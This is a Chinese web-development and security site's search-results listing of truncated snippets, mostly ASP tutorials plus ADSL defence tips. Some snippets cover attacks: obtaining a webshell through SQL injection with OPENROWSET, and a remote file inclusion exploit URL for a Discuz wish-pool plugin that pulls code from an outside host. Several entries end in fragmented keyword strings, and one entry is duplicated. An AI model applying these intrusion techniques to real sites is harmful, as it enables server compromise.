搜索列表
-
ASP编程入门进阶(十三):Ad & Content Rotator
【ASP编程】ASP的强大不仅仅局限于接受和显示的交互,更多的是运用ActiveX 组件进行更强大的Web应用。那究竟ActiveX组件为何物?它又是如何运作的呢?其实ActiveX Server Components(ActiveX 服务器组件)是一个存在于 WEB 服务器上的文件,该文件包含执行某项或一组任务的代码,组件可以执行公用任务,这样就不必自己去创...
ASP编程入门进阶(十三):Ad&ContentRotator -
ASP编程入门进阶(十八):FSO组件之文件操作(上)
【ASP编程】FSO中除了可以对驱动器、文件夹的操作以外,功能最强大的就是对文件的操作了。它可以用来记数、内容管理、搜索还可生成动态HTML页面等等。一、fso.OpenTextFile无需多说,fso.OpenTextFile就是打开某个文件了,一般情况之下是打开的txt文本文件。所以首先我们先建立一个txt文件,然后通过FSO来读取其中的内容。...
ASP编程入门进阶(十八):FSO组件之文件操作(上) -
渗透中用openrowset搞shell的方法
【安全相关】渗透中用openrowset搞shell的方法 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了. 联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事...
渗透中用openrowset搞shell的方法 -
如何对文件进行操作?
【编程10000问】<%@ LANGUAGE="VBScript" %><% 'Set file i/o constants. Const ForReading = 1 Const ForWriting = 2 Const ForAppending = 8 filename = "test.txt" path = Server.MapPath("data") & "\" & filename ' 映射...
|如何|何对|对文|文件|件进|进行|行操|操作|作?|?| -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
类似于iis浏览的功能
【ASP编程】<!---将此文件存为folder_list.asp看看效果就知道了加上权限就可以方便自己了,---> <% 'const_domain_name为域名最后不要加斜杠 const const_domain_name="http://localhost" %> <style> b,img,a{font-size:9pt;line-height:150%;text-decoration:none;color:#0000cc;} span{font-...
|类似|似于|于i|ii|is|s浏|浏览|览的|的功|功能|能| -
ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策
【ASP编程】scripting.filesystemobject 对象是由 scrrun.dll 提供的许多供 vbscript/jscript 控制的 com 对象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁。 filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。 最关键的是 find...
|AS|SP|P中|中F|FS|SO|O对|对象|象对|对I|II|IS|SW|WE|EB|B服|服务|务器|器数|数据|据安|安全|全的|的威|威胁|胁及|及 -
使用函数自动生成n层目录
【ASP编程】先检查是否已经存在该目录了,如果存在,则不做任何处理,如果不存在则创建。 希望对各位快速开发有用。 CheckFolder.asp <% '*********************************************************************************************************** '作 者: 赵敏 flash90@sohu.com '页面名称: CreateFolder.asp '页面功能...
|使用|用函|函数|数自|自动|动生|生成|成n|n层|层目|目录|录| -
ADSL防御黑客攻击的十大方法
【安全相关】 目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。 一、取消文件夹隐藏共享 如果你使用了...
|AD|DS|SL|L防|防御|御黑|黑客|客攻|攻击|击的|的十|十大|大方|方法|法| -
ASP编程实用20例
【ASP编程】1.如何用Asp判断你的网站的虚拟物理路径 答:使用Mappath方法 p align=center font size=4 face=Arial b The Physical path to this virtual website is b fon...
ASP编程实用20例 -
Aspjpeg添加水印完整方法
【ASP编程】ASPJPEG是Persits出品的共享软件,试用期为30天,您可以在这里下载:http://www.persits.com/aspjpeg.exe。最新版本号是1.3ASPJPEG是一款功能相当强大的图象处理组件,用它可以轻松地做出图片的缩略图和为图片加上水印功能。下面简单介绍一下使用方法:您先要执行下载得到的exe文件,安装该组件1、为图片制作...
Aspjpeg添加水印完整方法
